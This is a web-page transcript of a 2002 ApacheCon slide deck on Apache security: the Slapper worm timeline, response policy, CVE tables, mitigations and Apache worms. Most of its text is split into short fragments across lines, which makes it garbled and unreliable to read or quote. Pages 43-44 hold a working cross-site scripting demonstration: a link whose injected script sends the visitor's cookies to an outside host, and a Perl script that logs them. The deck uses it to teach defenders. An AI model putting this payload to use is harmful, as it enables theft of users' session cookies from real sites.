Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to...

51
Apache Security Secrets: Revealed for ApacheCon 2002, Las Vegas Mark J Cox revision 1 www.awe.com/mark/apcon2002

Transcript of Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to...

Page 1: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Apa

che

Secu

rity

Sec

rets

: R

evea

led

for

Apa

cheC

on 2

00

2, L

as V

egas

Mar

k J

Cox

revi

sion

1w

ww

.aw

e.co

m/m

ark/

apco

n2

00

2

Page 2: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Qu

ick

Intr

odu

ctio

nW

ho a

m I

?•

Why

do

you

care

?•

Wha

t is

Secu

rity

Resp

onse

Why

do

we

need

it?

•Re

d H

at, A

pach

e, O

penS

SL

Wha

t w

ill w

e co

ver?

Wha

t w

on’t

we

cove

r?To

ns o

f ex

tra

info

in t

he h

ando

ut•

also

ava

ilabl

e at

ww

w.a

we.

com

/mar

k/ap

con2

002/

Page 3: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Slap

per

Wor

mU

se a

n ex

ampl

e to

illu

stra

te s

ome

poin

tsSl

appe

r w

orm

fou

nd S

epte

mbe

r 20

02Ex

ploi

ted

Ope

nSSL

vul

nera

bilit

y•

But t

hrou

gh A

pach

e, th

eref

ore

inte

rest

ing

Look

at

the

timel

ine

Page 4: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

July

200

2A

ugus

tSe

ptem

ber

July

19:

Vul

nera

bilit

ies i

n O

penS

SL fo

und

in

code

aud

itJu

ly 2

3: C

ERT

cont

act u

s with

inde

pend

ent

verif

icat

ion

July

28:

Lin

ux a

nd O

penS

SL v

endo

rs n

otifi

ed

July

30:

Ope

nSSL

upd

ates

and

ann

ounc

emen

t

July

30:

Ven

dor u

pdat

es a

vaila

ble

Sept

13:

Firs

t exp

loit

(as a

wor

m)

Sept

17:

Ful

l rem

ote

expl

oit

45 d

ays

Page 5: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Com

mer

cial

or

Ope

n S

ourc

e?O

penS

SL•

Esta

blis

hed

proc

ess

•0

day

“win

dow

of k

now

n ris

k”•

Gav

e tim

e fo

r ad

min

istr

ator

s to

upg

rade

SSL-

C an

d O

penS

SL s

hare

com

mon

his

tory

•Si

mila

r vu

lner

abili

ties

affe

cted

SSL

-C•

The

timel

ine

is in

tere

stin

g

Page 6: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Aug

ust 2

002

Sept

embe

rO

ctob

er

July

30:

Ope

nSSL

upd

ates

and

ann

ounc

emen

t

July

30:

Ven

dor u

pdat

es a

vaila

ble

Aug

8: R

SA a

nnou

nce

issu

e

Aug

22:

RSA

mak

e fix

ed li

brar

ies a

vaila

ble

Sept

10:

Cov

alen

t 2.0

pac

kage

s

23 d

ays

70+

days

Sept

13:

Firs

t exp

loit

(as a

wor

m)

Sept

17:

Ful

l rem

ote

expl

oit

Page 7: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Wh

o w

as v

uln

erab

le?

Peop

le w

ho d

idn’

t up

date

the

ir sy

stem

s•

Why

did

n’t t

hey

upgr

ade?

Aban

done

dIn

stal

l and

For

get

Cry

Wol

f (t

oo m

uch

info

rmat

ion)

Inco

rrec

t or

mis

lead

ing

info

rmat

ion

Iner

tia, t

oo h

ard

to u

pgra

deTh

ey t

houg

ht t

hey

alre

ady

had

•H

ow c

an w

e he

lp?

Bett

er q

ualit

y in

form

atio

nEa

sier

to

upgr

ade

Ever

ybod

y th

ough

t Som

ebod

y w

ould

do

it. A

nybo

dy c

ould

hav

e do

ne it

But

Nob

ody

did.

And

in th

e en

d Ev

eryb

ody

got m

ad a

t So

meb

ody

Beca

use.

.. No

body

did

wha

t Any

body

cou

ld h

ave

done

.

Page 8: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Rel

ease

tak

e u

p

Page 9: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: Ke

ep

yo

ur

Sy

st

em

u

p t

o d

at

e

Page 10: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Secu

rity

Pol

icy

Why

bot

her?

Secu

rity

resp

onse

pol

icy

for

Apac

he•

Aler

t Pha

se•

Anal

ysis

Pha

se•

Resp

onse

Pha

se•

Mai

nten

ance

Pha

se

Assu

mpt

ions

•Ju

st A

pach

e•

Not

from

a v

endo

r

Page 11: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Ale

rt P

has

eW

here

to

get

your

in

form

atio

n•

How

the

qual

ity v

arie

sKe

ep n

otes

Apac

he m

ailin

g lis

tsCE

RT

CCBu

gtra

qFu

ll D

iscl

osur

eAp

ache

Wee

kAp

ache

web

site

Secu

rity

Site

s

Page 12: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

An

alys

is P

has

eW

hat

is t

he is

sue

all

abou

t?H

ow d

oes

it af

fect

you

•Im

pact

on

your

or

gani

satio

n•

Thre

at a

sses

smen

tReq

uire

s D

etec

tive

wor

kReq

uire

s tr

uste

d in

form

atio

n so

urce

s•

Chin

ese

Whi

sper

s•

Pres

s FU

D

MAR

C

Page 13: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Pre

ss c

onfu

sion

Spot

mis

take

s•

“was

vul

nera

ble”

•O

ne X

SS v

ulne

rabi

lity

•W

ildca

rd D

NS

•v1

.3 w

asn’

t vul

nera

ble

•M

atth

ew d

idn’

t pat

ch•

“arb

itrar

y ac

tions

”•

didn

’t bo

ther

to a

sk u

sTh

is a

lway

s ha

ppen

s•

even

whe

n th

ey a

sk u

s

Page 14: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Slap

per

Pre

ss

Page 15: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

San

s FU

D

Page 16: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: Se

cu

rit

y c

om

pa

nie

s h

av

e

th

eir

ow

n a

ge

nd

as

--M

SNB

C 1

6 Se

p 20

02

Page 17: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Apa

che

and

CV

ELo

ts o

f ve

ndor

s sh

ip A

pach

eLo

ts o

f ve

ndor

s re

port

on

Apac

he is

sues

•As

do

the

pres

s•

As d

o w

eekl

y jo

urna

ls

Com

mon

Vul

nera

bilit

ies

and

Expo

sure

s•

Mitr

e•

Dic

tiona

ry•

Cros

s-re

fere

nce

with

vul

nera

bilit

y da

taba

ses

•St

anda

rdis

atio

n an

d N

orm

alis

atio

n

Page 18: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively
Page 19: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

An

alys

isTh

ings

to

get

(fro

m t

he a

dvis

ory)

•Vu

lner

abili

ty n

ame

and

iden

tifie

rs•

Vers

ions

affe

cted

•Co

nfig

urat

ion

requ

ired

•Im

pact

and

sev

erity

•W

ork-

arou

nd•

Patc

hes

Page 20: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Get

tin

g to

kn

ow y

ouW

hat

are

you

runn

ing?

•N

map

Are

you

vuln

erab

le?

•Ex

ploi

ts•

Nes

sus

Dep

ende

ncie

s

Page 21: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: Go

to

th

e s

ou

rc

e

Page 22: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Res

pon

se P

has

eW

hat

are

you

goin

g to

do

abou

t it

•W

hat i

s th

e im

pact

?•

Wha

t pol

icie

s af

fect

it•

Upgr

ade

to th

e la

test

ver

sion

?•

or P

hase

d ap

proa

ch?

•or

Pat

ch?

•or

do

noth

ing?

But

mak

e su

re y

our

sour

ce is

n’t

a tr

ojan

Page 23: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Troj

an s

ourc

eIt

’s h

appe

ned

to O

penS

SH a

nd S

endm

ail

•Bu

t not

to A

pach

eYe

t

Page 24: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Ch

ecki

ng

the

sou

rce

Page 25: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Secu

rity

Pol

icy

Mai

nten

ance

Pha

seSt

eps

for

reco

verin

g fr

om c

ompr

omis

e•

LKM

roo

tkits

•H

ope

you

kept

a b

acku

p

Page 26: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: as

su

me

yo

u a

re

g

oin

g t

o g

et

ha

ck

ed

Page 27: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: Ke

ep

Ba

ck

up

s

Page 28: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Ven

dor

vers

ion

sPo

sitiv

es•

Wor

ks o

ut o

f the

box

•Cu

stom

ised

for

the

OS

•Te

sted

, QA’

d•

The

kitc

hen

sink

•O

ne s

ourc

e of

sec

urity

in

form

atio

n•

Auto

mat

ic u

pdat

es•

Inst

all a

nd fo

rget

•Ac

coun

tabi

lity

Trus

t•

Trus

t the

ven

dors

an

alys

is•

Trus

t the

ven

dor

to

prod

uce

timel

y cr

itica

l fix

esR

isks

•M

ix a

nd m

atch

•Fo

rced

to u

pgra

de•

Wha

t did

they

fix

Page 29: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: Tr

us

t y

ou

r v

en

do

r(i

f y

ou

do

n’t

th

en

ch

an

ge

v

en

do

r!)

Page 30: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Bac

kpor

tin

gCo

nfus

es e

very

one

It’s

no

long

er A

pach

e!So

why

do

it?•

Cust

omer

s de

man

d it

•To

o m

any

new

feat

ures

•Ce

rtifi

catio

n•

Qui

cker

and

pai

nles

s up

grad

es

Prob

lem

s•

Vers

ion

num

ber

does

n’t

chan

ge Conf

uses

too

lsCo

nfus

es N

essu

sCo

nfus

es u

sers

•Ve

ndor

s ha

ve th

eir

own

pack

age

vers

ioni

ngin

cons

iste

nt

Page 31: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Ope

n s

ourc

e is

mor

e se

cure

?“M

any

eyes

”•

How

man

y of

you

hav

e au

dite

d Ap

ache

?•

Ope

nSSL

vul

nera

bilit

ies

“eas

ily s

pott

ed”

•Th

ere

are

othe

r be

nefit

sN

o ne

ed f

or F

UD

Apac

he’s

his

tory

•Ju

st A

pach

e•

Nor

mal

isin

g to

CVE

Page 32: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Apa

che

1.3

.0 t

o 1

.3.2

7

Typ

e of

issu

eSe

veri

tyN

umbe

r of

vuln

erab

ilitie

sD

enia

l of S

ervi

ceH

igh

5Sh

ow a

dire

ctor

y lis

ting

Low

4R

ead

files

on

the

syst

emH

igh

3R

emot

e ar

bitra

ry c

ode

exec

utio

nH

igh

2C

ross

Site

Scr

iptin

gM

ediu

m2

Loca

l priv

ilege

esc

alat

ion

Med

ium

1R

emot

e R

oot E

xplo

itH

igh

0

Typ

e of

issu

eSe

veri

tyW

ho a

nd W

hen

Show

the

sour

ce to

CG

I scr

ipts

Med

ium

SuSE

Lin

ux, 2

000

Show

file

s in

/usr

/doc

Low

Deb

ian

Linu

x, 1

999

SuSE

Lin

ux, 2

000

Rea

d an

d w

rite

any

file

in d

ocro

otH

igh

SuSE

Lin

ux 2

000

Rea

d .h

tacc

ess f

iles

Med

ium

Cob

alt,

2000

Run

arb

itrar

y co

mm

ands

rem

otel

yH

igh

IBM

, 200

0

Page 33: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: Ap

ac

he

is a

lr

ea

dy

p

re

tt

y s

ec

ur

e

Page 34: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Den

ial o

f S

ervi

ceO

nly

inte

rest

ing

if it’

s ea

sy t

o do

•Bu

gs

Dire

ctiv

es t

o he

lp s

top

regu

lar

DO

S•

RLim

it* L

imitR

eque

st*

CV

ET

itle

Des

crip

tion

CA

N-

2001

-134

2D

enia

l of s

ervi

ce a

ttack

on W

in32

and

OS2

A c

lient

subm

ittin

g a

care

fully

con

stru

cted

UR

I cou

ld c

ause

aG

ener

al P

rote

ctio

n Fa

ult i

n a

child

pro

cess

, brin

ging

up

a m

essa

gebo

x w

hich

wou

ld h

ave

to b

e cl

eare

d by

the

oper

ator

to re

sum

e.no

neD

enia

l of s

ervi

ce a

ttack

on W

in32

Ther

e ha

ve b

een

a nu

mbe

r of i

mpo

rtant

secu

rity

fixes

to A

pach

eon

Win

dow

s. Th

e m

ost i

mpo

rtant

is th

at th

ere

is m

uch

bette

rpr

otec

tion

agai

nst p

eopl

e try

ing

to a

cces

s spe

cial

DO

S de

vice

nam

es (s

uch

as "

nul"

).C

AN

-19

99-1

199

Mul

tiple

hea

der D

enia

lof

Ser

vice

vul

nera

bilit

yA

pro

blem

exi

sts w

hen

a cl

ient

send

s a la

rge

num

ber o

f hea

ders

with

the

sam

e he

ader

nam

e. A

pach

e us

es u

p m

emor

y fa

ster

than

the

amou

nt o

f mem

ory

requ

ired

to si

mpl

y st

ore

the

rece

ived

dat

aits

elf.

none

Den

ial o

f ser

vice

atta

cks

Apa

che

1.3.

2 ha

s bet

ter p

rote

ctio

n ag

ains

t den

ial o

f ser

vice

atta

cks.

Page 35: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Get

doc

root

dir

ecto

ry li

stin

gs

Shou

ld b

e a

min

or im

pact

•As

long

as

you

don’

t do

som

ethi

ng s

illy

Dis

able

mod

_aut

oind

ex u

nles

s yo

u ne

ed it

CV

ET

itle

Des

crip

tion

CA

N-

2001

-07

29

Req

uest

s can

cau

se d

irect

ory

listin

g to

be

disp

laye

dA

vul

nera

bilit

y w

as fo

und

in th

e W

in32

por

t of A

pach

e1.

3.20

. A c

lient

subm

ittin

g a

very

long

UR

I cou

ld c

ause

adi

rect

ory

listin

g to

be

retu

rned

CA

N-

2001

-07

31

Mul

tivie

ws c

an c

ause

adi

rect

ory

listin

g to

be

disp

laye

dW

hen Multiviews

are

use

d to

neg

otia

te th

e di

rect

ory

inde

x. In

som

e co

nfig

urat

ions

, req

uest

ing

a U

RI w

ith a

QUERY_STRING

of M=D

cou

ld re

turn

a d

irect

ory

listin

gC

AN

-20

01-

0925

Req

uest

s can

cau

se d

irect

ory

listin

g to

be

disp

laye

dTh

e de

faul

t ins

talla

tion

can

lead

mod_negotiation

and

mod_dir

or mod_autoindex

to d

ispl

ay a

dire

ctor

ylis

ting

if a

very

long

pat

h w

as c

reat

ed a

rtific

ially

by

usin

gm

any

slas

hes.

CV

E-20

00-

0505

Req

uest

s can

cau

se d

irect

ory

listin

g to

be

disp

laye

d on

NT

A u

ser t

o vi

ew th

e lis

ting

of a

dire

ctor

y in

stea

d of

the

defa

ult

HTM

L pa

ge b

y se

ndin

g a

care

fully

con

stru

cted

requ

est.

Page 36: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Ret

urn

arb

itra

ry f

iles

It’s

act

ually

har

d to

do

•M

uch

easi

er t

hrou

gh a

bad

CG

I or

PH

P sc

ript

•Us

e a

CHRO

OT

jail

CV

ET

itle

Des

crip

tion

CA

N-

2000

-09

13

Rew

rite

rule

s tha

t inc

lude

refe

renc

es a

llow

acc

ess t

o an

y fil

eTh

e R

ewrit

e m

odul

e, mod_rewrite

, can

allo

w a

cces

sto

any

file

on

the

web

ser

ver.

The

vuln

erab

ility

occ

urs

only

with

cer

tain

spec

ific

case

s of u

sing

regu

lar

expr

essi

on re

fere

nces

in RewriteRule

dire

ctiv

esC

AN

-20

00-

1204

Mas

s virt

ual h

ostin

g ca

n di

spla

yC

GI s

ourc

eA

secu

rity

prob

lem

for u

sers

of t

he m

ass v

irtua

l hos

ting

mod

ule,

mod_vhost_alias

, cau

ses t

he so

urce

to a

CG

I to

be se

nt if

the cgi-bin

dire

ctor

y is

und

er th

edo

cum

ent r

oot.

How

ever

, it i

s not

nor

mal

to h

ave

your

cgi-b

in d

irect

ory

unde

r a d

ocum

ent r

oot.

CA

N-

2000

-12

06

Mas

s virt

ual h

ostin

g se

curit

y is

sue

A se

curit

y pr

oble

m c

an o

ccur

for s

ites u

sing

mas

s nam

e-ba

sed

virtu

al h

ostin

g (u

sing

the

new

mod_vhost_alias

mod

ule)

or w

ith sp

ecia

lmod_rewrite

rule

s.

Page 37: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Arb

itra

ry c

ode

exec

uti

onN

ight

mar

e sc

enar

ioIt

’s o

nly

happ

ened

ON

CEto

Apa

che

1.3

•an

d th

en it

was

lim

ited

to s

ome

plat

form

s•

and

you

didn

’t ge

t roo

t

CVE

Title

Desc

riptio

nCA

N-20

02-

0392

Apac

he C

hunk

eden

codin

g vuln

erab

ility

Requ

ests

to al

l ver

sions

of A

pach

e 1.3

can

caus

e var

ious

effec

ts ra

ngin

g fro

m a r

elativ

elyha

rmles

s inc

reas

e in s

ystem

reso

urce

s thr

ough

to de

nial

of se

rvice

attac

ks an

d in s

ome c

ases

the a

bilit

y to b

e rem

otely

explo

ited.

CAN-

2002

-00

61

Win

32 A

pach

eRe

mote

com

mand

exec

utio

n

Apac

he fo

r Win

32 be

fore

1.3.2

4 and

2.0.3

4-be

ta all

ows r

emot

e atta

ckers

to ex

ecut

ear

bitra

ry co

mman

ds vi

a par

amete

rs pa

ssed

toba

tch fi

le CG

I scr

ipts.

Page 38: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Mit

igat

e re

mot

e ex

ploi

tsU

se a

CH

ROO

T ja

il“T

his

is th

e be

st a

ppro

ach

we

can

curr

ently

take

aga

inst

suc

h a

mon

olot

hic

piec

e of

sof

twar

e w

ith s

uch

bad

beha

viou

rs. I

t is

just

too

big

to a

udit,

so

for

simpl

e us

age,

we

are

cons

trai

ning

it

to w

ithin

that

jail.

”--

Theo

de

Raa

dt, O

penB

SD

usr/

var/

hom

e/bo

ot/

/

ww

w/

htdo

cs/

htdo

cs/

/

Page 39: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Loca

l pri

vile

ge e

scal

atio

nA

uniq

ue is

sue

due

to a

bug

•Lo

cal A

pach

e ui

d ca

n do

thi

ngs

as r

oot

Caus

e a

DO

SKi

ll ar

bitr

ary

proc

esse

s

•Yo

u ca

n ge

t Apa

che

uid

from

CG

I, P

erl e

tc

CV

ET

itle

Des

crip

tion

CA

N-

2002

-08

39

Shar

ed m

emor

ype

rmis

sion

s lea

d to

loca

l priv

ilege

esca

latio

n

The

perm

issi

ons o

f the

shar

ed m

emor

y us

edfo

r the

scor

eboa

rd a

llow

s an

atta

cker

who

can

exec

ute

unde

r the

Apa

che

UID

to se

nd a

sign

al to

any

pro

cess

as r

oot o

r cau

se a

loca

lde

nial

of s

ervi

ce a

ttack

.

Page 40: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Cro

ss S

ite

Scri

ptin

g (X

SS)

Com

plet

ely

mis

unde

rsto

od•

Lets

try

an e

xam

ple

to s

how

the

atta

ck

cons

eque

nces

CVE

Title

Desc

riptio

nCA

N-20

02-

0840

Erro

r pag

e XSS

usin

g wi

ldca

rdDN

S

Cros

s-site

scrip

ting

(XSS

) vul

nera

bilit

y in

the d

efau

lt er

ror

page

of A

pach

e 2.0

bef

ore 2

.0.43

, and

1.3.x

up to

1.3

.26,

when

Use

Cano

nica

lNam

e is “

Off”

and

supp

ort f

or w

ildca

rdDN

S is

pres

ent,

allow

s rem

ote a

ttack

ers t

o ex

ecut

e scr

ipt a

sot

her w

eb p

age v

isito

rs vi

a the

Hos

t: he

ader

.CA

N-20

00-

1205

Cros

s-site

scrip

ting

can

reve

al pr

ivate

sess

ion

info

rmati

on

Apac

he w

as vu

lner

able

to cr

oss-s

ite sc

riptin

g iss

ues.

It wa

ssh

own

that

mali

cious

HTM

L tag

s can

be em

bedd

ed in

clien

twe

b re

ques

ts if

the s

erve

r or s

crip

t han

dlin

g th

e req

uest

does

not c

aref

ully

enco

de al

l inf

orm

ation

disp

layed

to th

e use

r.Us

ing

thes

e vul

nera

bilit

ies at

tacke

rs co

uld,

for e

xam

ple,

obtai

n co

pies

of yo

ur p

rivate

cook

ies u

sed

to au

then

ticate

you

to ot

her s

ites.

Page 41: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively
Page 42: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively
Page 43: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

<html><h1>My cute kitten</h1>

<a href=”http://www.awe.com/env.cgi?<script>

document.location=

’http://www.moosezone.com/cute.cgi%3F’+document.cookie

</script>”>Click here to see my cute kitten</a></html>

Page 44: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

#!/usr/bin/perl

print “Content-type: text/html\r\n\r\n”;

print “<h1>Awww…<h1><img src=cutekitten.jpg>”;

open(OUT,”>>/tmp/suckers”);

print OUT $ENV{“QUERY_STRING”};

close(OUT);

Page 45: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Oop

s

Page 46: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: Un

de

rs

ta

nd

C

ro

ss

-sit

e S

cr

ipt

ing

Page 47: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

mod

_re

wri

te c

anon

ical

isat

ion

CVE-2

001-1

072,

August

2001

Pass

//

to m

ost

rew

rite

rule

sIn

clud

ing

ones

in o

ur o

wn

docu

men

tatio

n

Wro

ng! RewriteRule ^/somepath(.*) /otherpath$1 [R]

Rig

htRewriteRule ^/+somepath(.*) /otherpath$1 [R]

http://www.awe.com/somepath/fred

http://www.awe.com//somepath/fred

...Th

is is

n’t

fixed

!!!

Page 48: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Att

acks

an

d Ex

ploi

tsW

ho e

xplo

its A

pach

e?W

hat

sort

of

atta

cks

•Ta

rget

ed•

Auto

mat

edW

orm

s

Wor

m m

akeu

p•

Expl

oit p

ortio

n•

Scan

ner

port

ion

•Pa

yloa

d po

rtio

n

Page 49: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Apa

che

Wor

ms

Nam

eD

ate

Aff

ects

Expl

oits

Slap

per

(Lin

ux.S

lapp

er-A

,Li

nux.

Slap

per-

Wor

m,

Apa

che/

mod

_ssl

Wor

m)

13 Sept

2002

Apa

che

with

mod

_ssl

and

Ope

nSSL

on

vario

us L

inux

plat

form

s

CA

N-

2002

-06

56

Linu

x.D

evnu

ll30 Se

pt20

02

Apa

che

with

mod

_ssl

and

Ope

nSSL

on

vario

us L

inux

plat

form

s

CA

N-

2002

-06

56

Scal

per (

Ehch

apa,

PHP/

Expl

oit-A

pach

e)28 Ju

ne20

02

Apa

che

on O

penB

SDan

d Fr

eeB

SDC

AN

-20

02-

0392

Page 50: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Secr

ets,

fin

ally

rev

eale

dD

on’t

Pani

cM

ake

a se

curit

y po

licy

for

deal

ing

with

Apa

che

emer

genc

ies

Miti

gate

the

ris

ksRev

iew

the

sec

rets

Page 51: Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively

Se

cr

et

: If

th

is is

to

o m

uc

h

ef

fo

rt

, tu

rn

of

f y

ou

r s

er

ve

r

"The

onl

y tr

uly

secu

re s

yste

m is

one

tha

t is

pow

ered

off

, cas

t in

a

bloc

k of

con

cret

e an

d se

aled

in a

lead

-line

d ro

om w

ith a

rmed

gua

rds

--

and

even

the

n I

have

my

doub

ts."

--

Gen

e Sp

affo

rd